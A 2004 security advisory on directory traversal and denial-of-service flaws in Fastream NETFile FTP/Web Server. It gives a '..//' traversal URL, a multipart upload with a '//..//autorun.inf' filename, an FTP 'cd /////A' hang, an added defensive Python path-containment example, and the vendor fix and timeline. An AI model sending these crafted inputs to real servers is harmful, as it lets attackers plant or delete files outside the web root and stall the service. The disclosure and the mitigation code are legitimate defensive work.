[NT] Fastream NETFile FTP/Web Server Input validation Errors
Date: 4 Jul 2004 18:45:52 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [NT] Fastream NETFile FTP/Web Server Input validation Errors

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



  Fastream NETFile FTP/Web Server Input validation Errors
------------------------------------------------------------------------


SUMMARY

Fastream NETFile Server is "a secure FTP server and Web server combined 
together in one application. Our claim is that it is the easiest to setup 
and use server on the Internet". Two security vulnerabilities in 
Fastream NETFile allow a remote attacker either to write to files that 
reside outside the bounding HTTP root directory or to cause a denial of 
service against the server.

DETAILS

Vulnerable Systems:
 * Fastream NETFile FTP/Web Server version 6.7.2.1085 and prior

Immune Systems:
 * Fastream NETFile FTP/Web Server version 6.7.3.1086

There are some input validation errors in Fastream NETFile that allow 
users to bypass the root directory restrictions. This vulnerability is easy 
to exploit and leads to a compromise of the system because Fastream NETFile 
allows remote users to upload/create/delete files in the application 
directory. Another vulnerability exists in the way that NETFile handles 
some URLs: after requesting a specially crafted directory it is possible to 
cause a denial of service lasting about one minute.

Exploit code:
The problem is in the way that NETFile handles two consecutive slashes.

Example URL:
http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY

C:\>dir FOLDE*
 Volume in drive C is W2000P
 Volume Serial Number is xxxx-xxxx

 Directory of C:\

07/03/2004  07:47p      <DIR>          FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
               0 File(s)              0 bytes
               1 Dir(s)     119,015,936 bytes free

NETFile allows some other methods in the "command" parameter that could be 
used to create/delete folders/files outside the root directory.

To exploit the file upload vulnerability we need to look at the data sent 
in the POST request:
-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain

THIS IS AN EXAMPLE

-----------------------------7d42c98700ea--

It's possible for an attacker to modify the filename parameter to something 
like Filename="//..//autorun.inf" and place malicious files on the 
system, or overwrite existing files.

It seems that the FTP server is not vulnerable to this issue and directory 
traversal attacks are not possible, but there is another bug that allows 
malicious users to cause a denial of service by executing the following 
command:
D:\>ftp localhost
Connected to at4r.intranet.
220 Fastream NETFile FTP Server Ready
User (at4r.intranet:(none)): ftp
331 Password required for ftp.
Password:
230 User ftp logged in.
ftp> cd /////A <-- here the ftp server hangs for a lot of time
599 No such directory.
ftp>
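The three findings above (the `..//` segment in the mkdir URL, the `//..//` prefix in the multipart upload filename, and the `/////A` FTP directory that stalls the server) all come from a client-supplied path being acted on before it is reduced to clean segments. The following Python is an added example written for this page; it is not NETFile's code and the advisory does not describe how NETFile resolves paths. It shows how a file-serving daemon on a Windows host can resolve a client path purely lexically, so that repeated slashes and backslashes collapse at constant cost, a `..` that would climb above the root is refused, and an uploaded filename is cut down to its final component. The root path `C:\NETFile\wwwroot` and every sample input are constructed for the example.

```python
"""Lexical path containment for a combined FTP/HTTP file server (added example)."""
import ntpath
from typing import List, Optional

# Constructed root directory; the advisory gives no real installation path.
WEB_ROOT = r"C:\NETFile\wwwroot"


def split_request_path(user_path: str) -> List[str]:
    """Turn a client-supplied path into clean segments.

    Both separators are honoured because the host is Windows, a drive prefix
    such as "D:" is dropped, and runs of slashes ("..//", "/////A") vanish
    because empty segments are discarded. This is purely lexical: no
    filesystem call is made, so a path made of many slashes costs no more
    than a short one.
    """
    unified = user_path.replace("\\", "/")
    if len(unified) >= 2 and unified[1] == ":":
        unified = unified[2:]
    return [seg for seg in unified.split("/") if seg not in ("", ".")]


def is_under_root(root: str, candidate: str) -> bool:
    """Prefix check on normalised, case-folded paths; the root itself counts."""
    root_n = ntpath.normpath(root).lower().rstrip("\\")
    cand_n = ntpath.normpath(candidate).lower()
    return cand_n == root_n or cand_n.startswith(root_n + "\\")


def safe_join(root: str, user_path: str) -> Optional[str]:
    """Return root joined with user_path, or None if it would leave root.

    '..' pops the segment before it. A '..' with nothing left to pop means the
    client is pointing above the root; that is refused rather than silently
    clamped, so the request can be logged as an attempt.
    """
    stack: List[str] = []
    for seg in split_request_path(user_path):
        if seg == "..":
            if not stack:
                return None
            stack.pop()
        else:
            stack.append(seg)
    joined = ntpath.join(root, *stack) if stack else root
    # Belt and braces: re-check the final string against the root prefix.
    return joined if is_under_root(root, joined) else None


def upload_target(root: str, client_filename: str) -> Optional[str]:
    """Resolve where a multipart upload may be written.

    Browsers may send a full client-side path ("D:\\foo.txt"); the server
    keeps only the final component, so a crafted "//..//autorun.inf"
    degrades to "autorun.inf" inside the root. Empty names and ".." are
    refused outright.
    """
    segments = split_request_path(client_filename)
    if not segments or segments[-1] == "..":
        return None
    return ntpath.join(root, segments[-1])


if __name__ == "__main__":
    # Constructed sample inputs mirroring the advisory's three cases.
    for p in ["docs/readme.txt", "..//ESCAPE", "/////A", "docs/../index.html"]:
        print(f"mkdir/cd {p!r:28} -> {safe_join(WEB_ROOT, p)}")
    for f in [r"D:\foo.txt", "//..//autorun.inf", "..", ""]:
        print(f"upload   {f!r:28} -> {upload_target(WEB_ROOT, f)}")
```

The design choice worth noting is that containment is decided on the segment list, not on the raw string: a check such as "reject anything starting with `..`" is exactly what `//..//` and `..//` slip past, while an after-the-fact `is_under_root` on the joined string catches any remaining mistake in the segment logic.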

Solution:
The best solution is to upgrade the software to version 6.7.3, which was 
released by the vendor on 3 July 2004. Another way to minimize the impact of 
this vulnerability is to store the root directory of the Fastream NETFile 
server on a separate partition and remove create/delete file and directory 
permissions from all users, including Guest accounts.

Disclosure Timeline:
3 July 2004: Vendor contacted.
3 July 2004: Issue fixed after 2 hours; new release 6.7.3 available.
4 July 2004: Public disclosure.


ADDITIONAL INFORMATION

The information has been provided by at4r <mailto:[email protected]>.
The original article can be found at:
http://www.haxorcitos.com/Fastream_advisory.txt





DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
